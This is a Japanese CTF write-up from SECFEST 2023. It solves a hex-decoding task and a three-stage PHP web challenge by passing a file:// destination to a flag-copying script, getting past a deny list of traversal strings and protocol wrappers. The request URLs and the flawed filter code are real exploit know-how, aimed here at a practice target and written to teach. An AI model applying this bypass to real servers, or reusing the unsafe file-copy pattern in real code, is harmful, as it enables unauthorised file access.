この大会は2023/5/25 19:00(JST)~2023/5/26 20:00(JST)に開催されました。
今回もチームで参戦。結果は141点で275チーム中69位でした。
自分で解けた問題をWriteupとして書いておきます。
sanity (misc)
問題に書かれている通り、コマンドを実行する。
$ echo '534543464553547b4261636b325468654261736963737d' | xxd -r -p SECFEST{Back2TheBasics}
SECFEST{Back2TheBasics}
flagcopy (web)
http://flagcopy-1.ctf.hackaplaneten.se/copy-source.phpにアクセスして、ソースコードを見る。
<?php // Make sure we have the destination filename if(!isset($_GET['dest'])) { header('Content-Type: text/plain'); header('Refresh: 2;url=..'); // Cool pirates don't use Location, docs: https://web.archive.org/web/20040811213204/http://devedge.netscape.com/library/manuals/1998/htmlguide/tags3.html echo "error! use: ?dest=<file>"; exit(0); } $dst=$_GET['dest']; // Prevent hackspettar $disallow = Array( // Bad files 'index.php', 'copy.php', 'flag.php', // Prevent traversals '..', './', '.\\', // Remove known bad characters '?','#','&', "\0", // Disallow bad protocols 'http://','https://','ftp://','zip://','rar://','expect://','phar://','zlib://','glob://','ssh2://','ogg://', // TODO: Improve security ); foreach($disallow as $word) { if (stripos($dst,$word) !== false) { echo "hacker attack detected!!1!"; exit(0); } } // Copy the flag to it's new location var_dump(copy('flag.php',$dst)); ?>
http://flagcopy-1.ctf.hackaplaneten.se/uploads/copy.php?dest=flag.txtにアクセスして、flag.txtにコピーする。
http://flagcopy-1.ctf.hackaplaneten.se/uploads/flag.txtにアクセスする。
nope <?php /* Ahoy mateys, it be me, Jack the pirate! I hear ye be lookin' for me flag copy function, but I've got some bad news for ye. It's all a ruse! That's right, me hearties, the only way to get yer hands on me flag copy function is to come and find me on the high seas. And even then, ye might have a hard time convincing me to part with it! But seriously, me hearties, ye shouldn't be messin' around with software piracy. It's a dangerous game, and ye might end up causin' more harm than good. So put down yer cutlasses and let's all sail the seas of software legality together. Arrrr! Also, check out my updated copy utility at: /flag-copy-final/index.html Ahoy, Jack */ ?>
http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final/index.htmlにアクセスする。
http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final/copy-source.phpにアクセスして、ソースコードを見る。
<?php // Make sure we have the destination filename if(!isset($_GET['dest'])) { header('Content-Type: text/plain'); header('Refresh: 2;URL=..'); // Cool pirates don't use Location, docs: https://web.archive.org/web/20040811213204/http://devedge.netscape.com/library/manuals/1998/htmlguide/tags3.html echo "error! use: ?dest=<file>"; exit(0); } $dst=$_GET['dest']; // Prevent hackspettar $disallow = Array( // Bad files 'index.php', 'copy.php', 'flag.php', // Prevent traversals '..', './', '.\\', // Remove known bad characters '?','#','&', "\0", // Disallow bad protocols 'http://','https://','ftp://','zip://','rar://','expect://','phar://','zlib://','glob://','ssh2://','ogg://', // Woops. We only want to share PHP. Good thing we have .htaccess // TODO: Improve security ); foreach($disallow as $word) { if (stripos($dst,$word) !== false) { echo "hacker attack detected!!1!"; exit(0); } } // Copy the flag to it's new location var_dump(copy('flag.php',$dst)); ?>
http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final/uploads/copy.php?dest=flag.txtにアクセスして、flag.txtにコピーする。
http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final/uploads/flag.txtにアクセスするが権限がない。
http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final/uploads/copy.php?dest=file:///var/www/html/flag.txtにアクセスして、/var/www/html/flag.txtにコピーする。
http://flagcopy-1.ctf.hackaplaneten.se/flag.txtにアクセスする。
warmer <?php /* Ahoy there, me hearties! It be Jack the pirate again, and I've got some more wisdom to share with ye. Ye know the old sayin', "Fool me once, shame on you. Fool me twice, shame on me"? Well, let me tell ye, it applies to software piracy too. If ye've been caught piratin' software once, shame on the software companies for makin' it too hard to resist. But if ye keep doin' it, ye're just askin' for trouble. Ye might think ye're gettin' away with it, but sooner or later, ye'll get caught. And when ye do, ye'll be wishin' ye had listened to old Jack here. So let me give ye some advice, me hearties. If ye want to stay out of trouble, stick to the straight and narrow. Buy yer software from reputable sources, and don't go messin' around with pirated copies. Trust me, it's not worth the risk. Arrrr! Check out my final flag copy update at: /flag-copy-final-pinky-promise-seriously/index.html */ ?>
http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final-pinky-promise-seriously/index.htmlにアクセスする。
http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final-pinky-promise-seriously/copy-source.phpにアクセスして、ソースコードを見る。
<?php // Make sure we have the destination filename if(!isset($_GET['dest'])) { header('Content-Type: text/plain'); header('Refresh: 2;url=..'); // Cool pirates don't use Location, docs: https://web.archive.org/web/20040811213204/http://devedge.netscape.com/library/manuals/1998/htmlguide/tags3.html echo "error! use: ?dest=<file>"; exit(0); } $dst=$_GET['dest']; // Prevent hackspettar $disallow = Array( // Bad files 'index.php', 'copy.php', 'flag.php', // Prevent traversals '..', './', '.\\', // Remove known bad characters '?','#','&', "\0", // Disallow bad protocols 'http://','https://','ftp://','zip://','rar://','expect://','phar://','zlib://','glob://','ssh2://','ogg://', // Woops. We only want to share PHP. Good thing we have .htaccess // Disallow pesky hackers 'filter/', ); foreach($disallow as $word) { if (stripos($dst,$word) !== false) { echo "hacker attack detected!!1!"; exit(0); } } // Copy the flag to it's new location var_dump(copy('flag.php',$dst)); ?>
http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final-pinky-promise-seriously/uploads/copy.php?dest=file:///var/www/html/flag.txtにアクセスして、/var/www/html/flag.txtにコピーする。
http://flagcopy-1.ctf.hackaplaneten.se/flag.txtにアクセスする。
you are so close <?php // SECFEST{@nt1p1ratByr0n_w0ulD_b3_pr0uD} ?>
SECFEST{@nt1p1ratByr0n_w0ulD_b3_pr0uD}
